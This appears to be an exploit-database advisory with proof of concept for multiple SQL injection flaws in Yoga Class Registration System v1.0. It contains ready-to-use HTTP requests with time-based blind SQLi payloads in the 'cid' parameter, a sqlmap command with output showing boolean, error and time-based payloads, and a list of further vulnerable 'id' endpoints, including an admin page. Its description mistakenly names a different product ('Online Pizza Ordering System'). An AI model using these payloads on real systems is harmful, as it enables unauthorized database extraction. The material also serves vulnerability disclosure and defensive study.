Yoga Class Registration System v1.0 Exploit, Multiple SQLi

# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim ├ľner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux

## Description
A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands.

## Request PoC
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v

```

This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works.

```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v

```

## Exploit with sqlmap
Save the request from burp to file
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2

---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```

## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.

All rights reserved nPulse.net 2009 - 2023
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD